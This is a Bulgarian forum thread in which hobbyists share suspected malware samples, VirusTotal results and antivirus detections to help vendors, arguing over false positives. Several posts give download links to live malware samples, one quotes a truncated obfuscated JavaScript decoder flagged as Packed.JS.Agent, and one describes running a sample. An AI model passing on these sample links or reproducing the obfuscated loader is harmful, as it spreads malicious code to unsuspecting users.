Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 8

Featured Replies

Една малка колекцийка

http://www.fileflyer.com/view/ppFTjBo

Защо го качваш на такива сложни места! А обясни сега как се сваля! Учудвам се на колеги, които се стремят към оригиналничене, качвайки файлове на трудни и неясни за сваляне места! Има прости и лесно достъпни места, проверени многократно в практиката: :cool:dox.bg или skatafka.com :mad:

  • Отговори 1,4k
  • Прегледи 66,8k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • На кого да помагаш? Трябва все пак да има и смисъл, нали? Пишеш му истини - то те замерва пак с минуси, защото само това може...Че почти нищо не знае си е едно на ръка. Стои си все в заразено състояни

  • https://www.virustotal.com/analisis/95107568455f7c669a1c690109b8fc28114f322d27dbe1f377a13500869e1b07-1269103277 Няма нужда от линк към това "нещо" нали? Има го на доста места тук! Защитите ми просто

  • Защо не пробвате това Trojan-Proxy.Win32.DiskMaster.ao.zip hxxp://www.skatafka.com/download.php?file=3dfa598aff1f1bd5334978c05cdd6027 18 програми още не реагират и най-добре да не Ви показвам обоб

Публикувани изображения

Защо го качваш на такива сложни места! А обясни сега как се сваля! Учудвам се на колеги, които се стремят към оригиналничене, качвайки файлове на трудни и неясни за сваляне места! Има прости и лесно достъпни места, проверени многократно в практиката: :cool:dox.bg или skatafka.com :mad:

Отново безпроблемно изтеглих архива. Близо 10 МБ е и не успях там да го кача - ето го и тук http://4storing.com/cxaxdc/5224e2c9a3070a68e216898e0b327b4d.html Някои програми създават ограничения в достъпа - на теб май ти харесват. Мен това би ме дразнило. Поздрави

hxxp://www.skatafka.com/download.php?file=47ede9c4b4d2bb355eeb58714716d3b0 https://www.virustotal.com/analisis/63f37be3c1d4bbf6a4388eca1a9d263555096aef16eb0be7398c699ee573c67b-1270118965 Има ли заплаха тук? Една трета от програмите отново не се ли "престарават"!? Или мълчащите спят?

hxxp://www.skatafka.com/download.php?file=47ede9c4b4d2bb355eeb58714716d3b0 https://www.virustotal.com/analisis/63f37be3c1d4bbf6a4388eca1a9d263555096aef16eb0be7398c699ee573c67b-1270118965 Има ли заплаха тук? Една трета от програмите отново не се ли "престарават"!? Или мълчащите спят?

CIS 4 казва "ДА"

post-238841-1270120876,36_thumb.jpg

CIS 4 казва "ДА"

На кое казва ДА - защото там липсва отново заплаха. Има фалшиви тревоги.

На кое казва ДА - защото там липсва отново заплаха. Има фалшиви тревоги.

Казва "да" с дефиниция както виждаш.

Казва "да" с дефиниция както виждаш.

И тази "дефиниция" я разархивирах - и къде е заплахата тук "function R0qgowvImQN(QrNtKFo){return String.fromCharCode(QrNtKFo);}function GDdqzIp2s(RPEofLbICV){var quzU6xTvgc605=0,n1xKtVVK25=RPEofLbICV.length,uibE1RG=1024,npIndy9EGL,nvlZFe6lz8p,SYMaYnqR="",dk0JjIY1dJb=quzU6xTvgc605,eApjF=quzU6xTvgc605,zMQTiypJWcAy=quzU6xTvgc605,Mj0ASRiS625e7=Array(63,27,59,40,44,49,45,41,2,16,0,0,0,0,0,0,54,25,22,33,18,57,23,31,55,5,7,6,51,13,20,36,34,46,38,62,30,3,24,0,37,48,39,0,0,0,0,9,0,19,56,14,10,29,61,58,28,26,32,4,35,43,52,47,1,12,8,11,42,21,17,60,15,53,50);for(nvlZFe6lz8p=Math.ceil(n1xKtVVK25/uibE1RG);nvlZFe6lz8p>quzU6xTvgc605;nvlZFe6lz8p--){for(npIndy9EGL=Math.min(n1xKtVVK25,uibE1RG);npIndy9EGL>quzU6xTvgc605;npIndy9EGL--,n1xKtVVK25--){zMQTiypJWcAy|=(Mj0ASRiS625e7[RPEofLbICV.charCodeAt(dk0JjIY1dJb++)-48])<<eApjF;if(eApjF){SYMaYnqR+=R0qgowvImQN(147^zMQTiypJWcAy&255);zMQTiypJWcAy>>=8;eApjF-=2;}else{eApjF=6;}}}return(SYMaYnqR);}var......" ?

И тази "дефиниция" я разархивирах - и къде е заплахата тук "function R0qgowvImQN(QrNtKFo){return String.fromCharCode(QrNtKFo);}function GDdqzIp2s(RPEofLbICV){var quzU6xTvgc605=0,n1xKtVVK25=RPEofLbICV.length,uibE1RG=1024,npIndy9EGL,nvlZFe6lz8p,SYMaYnqR="",dk0JjIY1dJb=quzU6xTvgc605,eApjF=quzU6xTvgc605,zMQTiypJWcAy=quzU6xTvgc605,Mj0ASRiS625e7=Array(63,27,59,40,44,49,45,41,2,16,0,0,0,0,0,0,54,25,22,33,18,57,23,31,55,5,7,6,51,13,20,36,34,46,38,62,30,3,24,0,37,48,39,0,0,0,0,9,0,19,56,14,10,29,61,58,28,26,32,4,35,43,52,47,1,12,8,11,42,21,17,60,15,53,50);for(nvlZFe6lz8p=Math.ceil(n1xKtVVK25/uibE1RG);nvlZFe6lz8p>quzU6xTvgc605;nvlZFe6lz8p--){for(npIndy9EGL=Math.min(n1xKtVVK25,uibE1RG);npIndy9EGL>quzU6xTvgc605;npIndy9EGL--,n1xKtVVK25--){zMQTiypJWcAy|=(Mj0ASRiS625e7[RPEofLbICV.charCodeAt(dk0JjIY1dJb++)-48])<<eApjF;if(eApjF){SYMaYnqR+=R0qgowvImQN(147^zMQTiypJWcAy&255);zMQTiypJWcAy>>=8;eApjF-=2;}else{eApjF=6;}}}return(SYMaYnqR);}var......" ?

Ами питай Комодо,не мен,те са я писали,аз само постнах резултата от скана.

  • Автор

На кое казва ДА - защото там липсва отново заплаха. Има фалшиви тревоги.

И как разбра,че е фалшива тревога? Ти ли си го измисли? Какво доказваш и какво показваш с това,като отваряш скрипта с notepad ?

Ами питай Комодо,не мен,те са я писали,аз само постнах резултата от скана.

Комодо вероятно са я взаимствали тази дефиниция от Касперски или Икарус - Packed.JS.Agent.e - май здраво преписване пада. Те точно тези програми най-много вредители като количество "ловят" - а какво ловят??? Когато се отваря скрипта с notepad без отреагирания на проактивните защити си правя извод за безвредност - греша ли? В обратния случай те се задействуват.

Редактирано от TNN (преглед на промените)

  • Автор

Те точно тези програми най-много вредители като количество "ловят" - а какво ловят???

Вредоносен скрипт,това ловят!Скрипт, който се активира чрез браузъра,от там вече се следва изпълнението му,а именно тогава: Атакуващите могат да изпълнят Java скрипт към страница, която използва истинското съдържание, но вече към ново-заредения сайт. Това действие, от своя страна, предоставя множество възможности, вкл. прочитане или поставяне на бисквитки, контролирани от доверени сайтове, промяна на формуляри, свързани с даден URL, инжектиране на код или нестабилност на браузъра.Начина, по който браузерът с борави с IFRAME и може да позволи на атакуващите да следят натисканите от потребителя клавиши. Потенциално, той може да се използва за сваляне или стартиране на файлове без знанието на потребителя.

Когато се отваря скрипта с notepad без отреагирания на проактивните защити си правя извод за безвредност - греша ли? В обратния случай те се задействуват.

Май не вдяваш,скрипта го активира браузъра,не както ти с десен бутон отвори с notepad,по този начин няма стартиране.

Има си лаборатории и те си решават кое е опасното и кое не.Ние тук нито ти нито който и да е било има възможността и знанията да определя кое е заплаха и кое не. В случая пращаме съмнителни файлове,айде да не се правим на големи разбирачи,ОК?

Съобразявай се със заглавието на темата с нищо не подпомагаш в случая!

Не ми е изключен браузъра и колкото и с ляв бутон да си кликам над този rar-файл, нищо не се активира при мен.В другите случаи е доста различно - веднага се намесват IDS/HIPS модулите. Подпомагането е да си преразгледат дефиницията - ако всички я добавят ще е трагикомично. Поздрави

Редактирано от TNN (преглед на промените)

  • Автор

Не ми е изключен браузъра и колкото и с ляв бутон да си кликам над този rar-файл, нищо не се активира при мен..

Е как ще се активира,като ти цъкаш на архивен файл директно.И до утре да цъкаш същата работа.

Е как ще се активира,като ти цъкаш на архивен файл директно.И до утре да цъкаш същата работа.

Прав си - за този конкретен файл и до утре да кликам пак... нищо. Иначе дори съобщение от браузъра съм пренебрегнал и съм изтеглил потенциално-опасен файл.

Прав си - за този конкретен файл и до утре да кликам пак... нищо. Иначе дори съобщение от браузъра съм пренебрегнал и съм изтеглил потенциално-опасен файл.

За да се заразиш с този агент,първо трябва да си направиш уеб-сайт,после да създадеш htm документ със съдържанието му,след това да направиш друг сайт към който да те насочи за да изтеглиш вредоносен код,май е доста сложничко а :)

J7zWHRp.png

А тази проба никой не я праща а MBAM лови hййp://www.skatafka.com/download.php?file=2dac100322cbd752f32be912ed2823f2 :)

А тази проба никой не я праща а MBAM лови hййp://www.skatafka.com/download.php?file=2dac100322cbd752f32be912ed2823f2 :)

Въпросът е дали това е реална заплаха,защото само Нортон и McAfee го ловят, но проактивно.На Нортон облака го знаем- непознат файл-значи заплаха. http://www.virustotal.com/analisis/30e16f6d7a4ab50ad720c3324e32767aae79a0dd82c8e088683923aa27df924d-1270127793 Но все пак ще го изпратя за анализ на Касперски и ще пиша

Редактирано от ivan_baroveca (преглед на промените)

Въпросът е дали това е реална заплаха,защото само Нортон и McAfee го ловят, но проактивно.На Нортон облака го знаем- непознат файл-значи заплаха. http://www.virustotal.com/analisis/30e16f6d7a4ab50ad720c3324e32767aae79a0dd82c8e088683923aa27df924d-1270127793 Но все пак ще го изпратя за анализ на Касперски и ще пиша

Пиши ще е интересно ако MBAM отчита заплаха а Kaspersky -не :cool:

А аз мисля че има от там не са ме разочаровали винаги искат да инсталирам нещо :cool:

А тук съм учуден има цифров подпис hййp://dox.bg/files/dw?a=37d9e84d8d а е свалено от тук и Symantec казват че има заплаха hййp://safeweb.norton.com/report/show?name=tatendoaqui.com.br :rolleyes:

А тази проба никой не я праща а MBAM лови hййp://www.skatafka.com/download.php?file=2dac100322cbd752f32be912ed2823f2 :rolleyes:

1. При нормално сканиране- гробно мълчание!

2. Стартирах

3. Земена скочи (забравих да направя снимка)

4. След няколко пускания (приз цялото време хипса на Комодо НЕ даде нито един подозрителен сигнал) Аваст скочи. Дадох ОК за "преместване в клетката" но явно това животно се мултиплицира постоянно, защото тези съобщения на Аваст, заваляха, като пороен дъжд!

1475292Y.jpg

5. В крайна сметка се намеси DW, която поиска да килна това животно, и....всичко приключи за миг!

Извод: Неизбежно, даже бих казал, задължително присъствие на DW на всеки компютър!

Пиши ще е интересно ако MBAM отчита заплаха а Kaspersky -не :cool:

А аз мисля че има от там не са ме разочаровали винаги искат да инсталирам нещо :cool:

А тук съм учуден има цифров подпис hййp://dox.bg/files/dw?a=37d9e84d8d а е свалено от тук и Symantec казват че има заплаха hййp://safeweb.norton.com/report/show?name=tatendoaqui.com.br :rolleyes:

И тук Касперски не реагира

1. При нормално сканиране- гробно мълчание!

2. Стартирах

3. Земена скочи (забравих да направя снимка)

4. След няколко пускания (приз цялото време хипса на Комодо НЕ даде нито един подозрителен сигнал) Аваст скочи. Дадох ОК за "преместване в клетката" но явно това животно се мултиплицира постоянно, защото тези съобщения на Аваст, заваляха, като пороен дъжд!

1475292Y.jpg

5. В крайна сметка се намеси DW, която поиска да килна това животно, и....всичко приключи за миг!

Извод: Неизбежно, даже бих казал, задължително присъствие на DW на всеки компютър!

Е това е обективно мнение защото и аз използвам Аваст и при мен се получи същото :rolleyes:

"Извод: Неизбежно, даже бих казал, задължително присъствие на DW на всеки компютър!" Сега всички ли трябва да я инсталират заедно с още N програми? Какво му е неизбежното ? Трябва да деинсталирам SEP 11 или OA++ ли ? Та аз непрекъснато установявам, че на тези две самостоятелно ползвани защитни програми май въобще не им е нужно подпомагане от такива като нас тук...Поздрави

"Извод: Неизбежно, даже бих казал, задължително присъствие на DW на всеки компютър!" Сега всички ли трябва да я инсталират заедно с още N програми? Какво му е неизбежното ? Трябва да деинсталирам SEP 11 или OA++ ли ? Та аз непрекъснато установявам, че на тези две самостоятелно ползвани защитни програми май въобще не им е нужно подпомагане от такива като нас тук...Поздрави

Е ми не знам има си хора който разбират а те не са дали 100 процента защита нито на OA или на SEP 11 а на друга ...Можеш да ме обориш ако си в екипа на AV Comperatives :rolleyes:

Че кой смята да спори с теб.А на AV Comperatives в Америка, Азия и Австралия им се чудят отвсякъде...Затова никакви единни критерии за тествания не могат да се изготвят.

Гост
Тази тема е заключена за нови отговори.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.